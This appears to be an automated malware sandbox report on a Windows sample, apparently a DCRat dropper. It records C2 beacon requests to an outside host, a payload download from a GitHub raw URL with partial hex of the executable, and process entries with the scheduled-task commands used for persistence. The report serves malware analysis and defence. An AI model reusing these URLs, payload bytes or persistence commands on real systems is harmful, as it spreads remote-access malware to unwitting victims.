Dec 15, 2024 00:26:20.329792023 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:26:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye
Dec 15, 2024 00:26:25.343332052 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:26:25.788796902 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:26:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye
Dec 15, 2024 00:26:30.796363115 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:26:31.408529043 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:26:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.199.109.133	443	7272	C:\Users\user\Desktop\LaRHzSijsq.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 23:22:03 UTC	115	OUT	GET /UnhitRat/Avast/refs/heads/main/Optmz.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-12-14 23:22:04 UTC	901	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1210495 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "21b8837dfb2a9b511b2a65238aa9ca0bd873654ab5f7f4228313e9abbc7f1c4f" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 0CBD:39F52:2E9B90:32E65B:675E131A Accept-Ranges: bytes Date: Sat, 14 Dec 2024 23:22:04 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740047-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1734218524.988109,VS0,VE15 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 8419f276ebb3fd509a5e9fe88d31003b8008caaf Expires: Sat, 14 Dec 2024 23:27:04 GMT Source-Age: 0
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 62 60 f7 e3 26 01 99 b0 26 01 99 b0 26 01 99 b0 92 9d 68 b0 2b 01 99 b0 92 9d 6a b0 ab 01 99 b0 92 9d 6b b0 3e 01 99 b0 b8 a1 5e b0 24 01 99 b0 1d 5f 9a b1 30 01 99 b0 1d 5f 9d b1 35 01 99 b0 1d 5f 9c b1 0a 01 99 b0 2f 79 1a b0 2c 01 99 b0 2f 79 0a b0 23 01 99 b0 26 01 98 b0 2a 00 99 b0 b1 5f 9c b1 17 01 99 b0 b1 5f 99 b1 27 01 99 b0 b4 5f 66 b0 27 01 99 b0 b1 5f 9b b1 27 01 99 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$b`&&&h+jk>^$_0_5_/y,/y#&*__'_f'_'
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 00 00 00 e8 67 cc 00 00 50 56 e8 e5 ec 00 00 56 e8 3c 24 02 00 59 8d 8d a8 fb ff ff 8d 34 46 83 c6 02 8b c6 2b c1 d1 f8 2b d8 53 68 b0 35 43 00 56 e8 be ec 00 00 56 e8 15 24 02 00 33 c9 6a 58 66 89 4c 46 02 8d 45 a8 5e 56 51 50 e8 9d e1 01 00 8b 45 08 83 c4 10 8a 5d 18 8b 7d 10 89 45 ac a1 d0 0e 44 00 89 45 b0 8d 85 a8 fb ff ff 89 45 b4 8b 45 0c 89 45 d8 8d 45 a8 89 75 a8 89 7d c4 c7 45 c8 00 08 00 00 c7 45 dc 0c 08 01 00 50 84 db 74 08 ff 15 3c 20 46 00 eb 06 ff 15 44 20 46 00 8b f0 85 f6 75 2c ff 15 40 20 46 00 3d 02 30 00 00 75 1d 33 c0 66 89 07 8d 45 a8 50 84 db 74 08 ff 15 3c 20 46 00 eb 06 ff 15 44 20 46 00 8b f0 85 f6 5f 5e 0f 95 c0 5b 8b e5 5d c2 14 00 55 8b ec 81 ec 2c 02 00 00 8d 45 fc 50 ff 15 88 20 46 00 85 c0 74 04 32 c0 eb 66 8b 45 08 33 c9 Data Ascii: gPVV<$Y4F++Sh5CVV$3jXfLFE^VQPE]}EDEEEEEu}EEPt< FD Fu,@ F=0u3fEPt< FD F_^[]U,EP Ft2fE3
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 56 e8 b3 cb 01 00 59 59 8b c6 5e c2 04 00 8b 44 24 04 56 8b f1 01 46 04 8b 4e 04 3b 4e 08 0f 86 9d 00 00 00 8b 46 0c 53 55 bd 50 0f 44 00 57 85 c0 74 1a 3b c8 76 16 50 68 d8 35 43 00 55 e8 8a 57 00 00 83 c4 0c 8b cd e8 ec 57 00 00 8b 46 08 8b 5e 04 c1 e8 02 83 c0 20 03 46 08 3b d8 77 02 8b d8 80 7e 10 00 53 74 3a e8 a1 1e 02 00 8b f8 59 85 ff 75 07 8b cd e8 bd 57 00 00 83 3e 00 74 38 ff 76 08 ff 36 57 e8 60 dd 01 00 83 c4 0c ff 76 08 ff 36 e8 9b d5 00 00 ff 36 e8 6a 1e 02 00 59 eb 16 ff 36 e8 70 1e 02 00 8b f8 59 59 85 ff 75 07 8b cd e8 80 57 00 00 89 3e 5f 5d 89 5e 08 5b 5e c2 04 00 8b 44 24 04 56 8b f1 01 46 04 8b 4e 04 3b 4e 08 0f 86 a6 00 00 00 8b 46 0c 53 55 bd 50 0f 44 00 57 85 c0 74 1a 3b c8 76 16 50 68 d8 35 43 00 55 e8 d3 56 00 00 83 c4 0c 8b cd Data Ascii: VYY^D$VFN;NFSUPDWt;vPh5CUWWF^ F;w~St:YuW>t8v6W`v66jY6pYYuW>_]^[^D$VFN;NFSUPDWt;vPh5CUV
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 0b 8d 43 24 50 6a 1b e8 8f 51 00 00 80 7d 08 00 0f 84 a9 fd ff ff 80 7d f2 00 8a 83 24 22 00 00 88 83 b6 6c 00 00 0f 84 0c 01 00 00 80 bb e0 21 00 00 00 74 0d 80 bb bc 6c 00 00 00 0f 85 f6 00 00 00 8b 03 8b 70 14 8b ce ff 15 60 32 43 00 8b cb ff d6 8b f0 8b fa 8b 83 a0 6c 00 00 89 45 e8 8b 83 a4 6c 00 00 89 45 ec 8b 83 a8 6c 00 00 89 45 e4 8b 83 ac 6c 00 00 89 45 e0 8b 83 dc 21 00 00 89 45 dc eb 44 b0 01 e9 4f ff ff ff 8b 83 dc 21 00 00 83 f8 03 75 21 80 bb b5 6c 00 00 00 74 0e 80 bb 68 56 00 00 00 75 05 33 c0 40 eb 02 33 c0 88 83 b9 6c 00 00 eb 0a 83 f8 02 74 19 83 f8 05 74 33 8b cb e8 ea 01 00 00 8b cb e8 b5 1d 00 00 85 c0 75 b8 eb 1f 80 bb b5 6c 00 00 00 74 0e 80 bb 18 33 00 00 00 75 05 33 c0 40 eb 02 33 c0 88 83 b9 6c 00 00 8b 45 e8 89 83 a0 6c 00 00 Data Ascii: C$PjQ}}$"l!tlp`2ClElElElE!EDO!u!lthVu3@3ltt3ult3u3@3lEl
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 82 51 06 00 00 2b d0 89 47 1c 83 fa 02 0f 82 43 06 00 00 53 8b 9c 24 c4 20 00 00 55 56 8b cf e8 34 a5 00 00 8b c8 85 d2 0f 8c 25 06 00 00 7f 08 85 c9 0f 84 1b 06 00 00 8b 47 18 8b 77 1c 2b c6 0f 84 0d 06 00 00 85 d2 0f 8f 05 06 00 00 7c 08 3b c8 0f 87 fb 05 00 00 8d 2c 0e 8b cf 89 6c 24 28 e8 f2 a4 00 00 2b 6f 1c 8b f0 8b c2 33 c9 89 44 24 24 89 4c 24 20 0f 8c d6 05 00 00 7f 08 85 ed 0f 82 cc 05 00 00 83 7b 04 01 0f 85 82 00 00 00 83 fe 01 75 7d 85 c0 75 79 8b cf c6 43 1e 01 e8 b3 a4 00 00 89 44 24 1c a8 01 74 2f 8b cf e8 a4 a4 00 00 8b c8 0b ca 74 1e 8b 4c 24 18 8b 89 a0 6c 00 00 03 c8 8b 44 24 18 8b 80 a4 6c 00 00 13 c2 89 4b 20 89 43 24 8b 44 24 1c a8 02 74 2b 8b cf e8 71 a4 00 00 8b c8 0b ca 74 1e 8b 4c 24 18 8b 89 a0 6c 00 00 03 c8 8b 44 24 18 8b 80 Data Ascii: Q+GCS$ UV4%Gw+\|;,l$(+o3D$$L$ {u}uyCD$t/tL$lD$lK C$D$t+qtL$lD$
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 24 28 8d 44 24 40 83 c4 10 50 8d 43 28 50 e8 b8 18 00 00 6a 10 8d 83 a1 10 00 00 8b cf 50 e8 35 9f 00 00 6a 10 8d 83 b1 10 00 00 8b cf 50 e8 25 9f 00 00 80 bb c1 10 00 00 00 0f 84 84 00 00 00 6a 08 8d b3 c2 10 00 00 8b cf 56 e8 08 9f 00 00 6a 04 8d 44 24 30 8b cf 50 e8 fa 9e 00 00 8d 44 24 58 50 e8 75 d1 00 00 6a 08 56 8d 44 24 60 50 e8 ae d1 00 00 8d 44 24 30 50 8d 44 24 5c 50 e8 68 d0 00 00 6a 04 8d 44 24 34 50 8d 44 24 34 50 e8 7b d6 01 00 83 c4 0c f7 d8 1a c0 fe c0 83 7b 04 03 88 83 c1 10 00 00 75 1a 6a 08 68 68 36 43 00 56 e8 59 d6 01 00 83 c4 0c 85 c0 75 06 88 83 c1 10 00 00 c6 83 a0 10 00 00 01 c7 83 9c 10 00 00 05 00 00 00 c6 83 9b 10 00 00 01 8b 4c 24 28 89 4f 1c 8b 47 18 2b c1 83 f8 02 0f 83 ca f9 ff ff 5e 5d 5b 5f 81 c4 b0 20 00 00 c2 0c 00 55 Data Ascii: $(D$@PC(PjP5jP%jVjD$0PD$XPujVD$`PD$0PD$\PhjD$4PD$4P{{ujhh6CVYuL$(OG+^][_ U
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: fc 10 00 00 eb 0a c7 86 fc 10 00 00 01 00 00 00 89 8e 00 11 00 00 3c 03 75 22 8b 45 58 25 00 f0 00 00 3d 00 a0 00 00 75 13 33 c0 c7 86 00 11 00 00 01 00 00 00 66 89 86 04 11 00 00 83 ff 02 74 0a 39 4e 24 7d 05 33 c0 40 eb 02 8b c1 88 86 f8 10 00 00 8b 46 08 c1 e8 08 24 01 88 86 f9 10 00 00 74 2c 8d 4d 24 e8 29 99 00 00 8d 4d 24 8b f8 e8 1f 99 00 00 83 7d 54 ff 8b d0 75 0c 83 fa ff 75 07 33 c0 40 33 c9 eb 11 33 c9 8b c1 eb 0b 83 7d 54 ff 8b d1 8b f9 0f 94 c0 88 86 9a 10 00 00 33 c0 03 46 14 89 86 58 10 00 00 13 f9 33 c0 03 45 54 89 be 5c 10 00 00 13 d1 89 86 60 10 00 00 80 be 9a 10 00 00 00 89 96 64 10 00 00 74 11 b8 ff ff ff 7f 89 86 60 10 00 00 89 86 64 10 00 00 8b 45 4c bf ff 1f 00 00 89 7d 54 3b c7 73 05 8b f8 89 45 54 57 8d 85 d0 df ff ff 50 8d 4d 24 Data Ascii: <u"EX%=u3ft9N$}3@F$t,M$)M$}Tuu3@33}T3FX3ET\`dt`dEL}T;sETWPM$
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 94 00 00 0f b7 c0 39 83 e4 21 00 00 0f 84 9e 00 00 00 8b 83 e8 21 00 00 83 f8 79 0f 84 8f 00 00 00 83 f8 76 0f 84 86 00 00 00 83 f8 05 75 53 80 bb ae 45 00 00 00 74 4a 8b 03 8b 70 14 8b ce ff 15 60 32 43 00 8b cb ff d6 8b 33 33 c9 2b c7 51 1b d1 8b 4e 10 52 50 ff 15 60 32 43 00 8b cb ff 56 10 c6 45 5e 01 8b cb e8 42 67 00 00 f6 d8 1a c0 f6 d0 22 45 5e 88 45 5e 83 ef 01 75 e8 84 c0 75 2e 6a 03 b9 50 0f 44 00 c6 83 c4 6c 00 00 01 e8 83 3d 00 00 80 7d 5f 00 74 15 8d 43 24 50 50 6a 04 e8 3f ed ff ff c6 83 c5 6c 00 00 01 eb 06 8b 45 3c 89 45 1c 8d 4d 24 e8 34 e3 ff ff 8b 4d f4 8b 45 1c 5f 5e 5b 64 89 0d 00 00 00 00 8d 65 60 5d c3 55 83 ec 68 b8 01 1d 43 00 e8 fd af 01 00 b8 68 20 00 00 e8 c7 b0 01 00 53 56 8b d9 8d 4d 30 57 53 e8 be 92 00 00 33 c9 89 4d 60 89 Data Ascii: 9!!yvuSEtJp`2C33+QNRP`2CVE^Bg"E^E^uu.jPDl=}_tC$PPj?lE<EM$4ME_^[de`]UhCh SVM0WS3M`
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: c0 8d 78 ff 81 e7 b0 dc ff ff 81 c7 d0 45 00 00 03 fb 8b cf 89 7d 2c e8 06 75 00 00 6a 05 59 8d b3 e4 21 00 00 f3 a5 8b 83 e8 21 00 00 8d 4d 30 8b 75 2c 89 45 60 8b 45 64 89 86 58 10 00 00 8b 45 5c c6 86 f9 10 00 00 01 89 86 5c 10 00 00 e8 7c 8f 00 00 8d 4d 30 89 86 94 10 00 00 e8 6e 8f 00 00 89 86 60 10 00 00 8b 86 94 10 00 00 c1 e8 03 24 01 89 96 64 10 00 00 88 86 9a 10 00 00 74 11 b8 ff ff ff 7f 89 86 60 10 00 00 89 86 64 10 00 00 8b 8e 5c 10 00 00 8b be 64 10 00 00 8b 86 58 10 00 00 8b 96 60 10 00 00 3b cf 7c 06 7f 08 3b c2 77 04 8b c2 8b cf 89 8e 6c 10 00 00 8d 4d 30 89 86 68 10 00 00 e8 04 8f 00 00 f6 86 94 10 00 00 02 89 46 24 74 16 8d 4d 30 e8 f0 8d 00 00 6a 00 50 8d 8e 40 10 00 00 e8 bf d5 00 00 83 a6 70 10 00 00 00 f6 86 94 10 00 00 04 74 18 8d Data Ascii: xE},ujY!!M0u,E`EdXE\\\|M0n`$dt`d\dX`;\|;wlM0hF$tM0jP@pt
2024-12-14 23:22:04 UTC	1378	IN	Data Raw: 92 56 00 00 50 8d 86 9b 56 00 00 f7 d9 50 ff b6 bc 56 00 00 8d 86 81 56 00 00 1b c9 50 8d 86 71 56 00 00 23 c8 8d 82 24 50 00 00 51 50 ff b6 6c 56 00 00 8d 8e e8 20 00 00 53 e8 e0 8c 00 00 6a 01 ff b6 40 56 00 00 8d 8e a0 21 00 00 e8 c4 6d 00 00 8b 86 28 56 00 00 8d 8e e8 20 00 00 ff 75 0c 89 86 08 21 00 00 8b 86 2c 56 00 00 56 89 86 0c 21 00 00 88 9e 10 21 00 00 e8 e8 8c 00 00 8a 45 10 8d 8e e8 20 00 00 88 86 11 21 00 00 8a 86 69 56 00 00 88 86 37 21 00 00 8d 86 d0 45 00 00 89 41 38 89 59 3c 8b 86 30 56 00 00 8b 96 34 56 00 00 89 85 5c 65 ff ff 89 95 60 65 ff ff 88 9d 74 65 ff ff 38 9e f0 45 00 00 75 0a 52 50 51 e8 a0 55 00 00 eb 12 53 ff b6 ec 45 00 00 8d 8d 14 19 ff ff e8 97 eb 00 00 0f b6 96 9a 56 00 00 8d 86 9b 56 00 00 f7 da 8d 8e a0 21 00 00 1b d2 Data Ascii: VPVPVVPqV#$PQPlV Sj@V!m(V u!,VV!!E !iV7!EA8Y<0V4V\e`ete8EuRPQUSEVV!

Target ID:	0
Start time:	18:22:00
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\LaRHzSijsq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\LaRHzSijsq.exe"
Imagebase:	0x9b0000
File size:	19'968 bytes
MD5 hash:	74F1FCF96C9E31F50F6D83072EC68D07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1689751552.00000000009B4000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1742291548.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:22:00
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:22:05
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\ry0bqfj0.vyo.exe"
Imagebase:	0x7d0000
File size:	1'210'495 bytes
MD5 hash:	24AB440AE1EE72BB5ABB8C40DBC4FF4C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:22:06
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinSattl\H4iFvhalfT9t12Rug.vbe"
Imagebase:	0x320000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:22:15
Start date:	14/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinSattl\9Jks4Q9248ljrax16iPG1ojfLKPqxh.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:22:16
Start date:	14/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:22:16
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\WinSattl\WinLatency.exe"
Imagebase:	0xc80000
File size:	893'440 bytes
MD5 hash:	B26EA50DE8F1DA57B78E045EC904E19A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.1880642049.0000000012F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.1878443146.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.1878443146.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgT" /sc ONLOGON /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 11 /tr "'C:\Users\Default\AppData\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UplbXNLOfTNXjbhPJQLmKdgTU" /sc MINUTE /mo 6 /tr "'C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:22:17
Start date:	14/12/2024
Path:	C:\Windows\System32\schtasks.exe
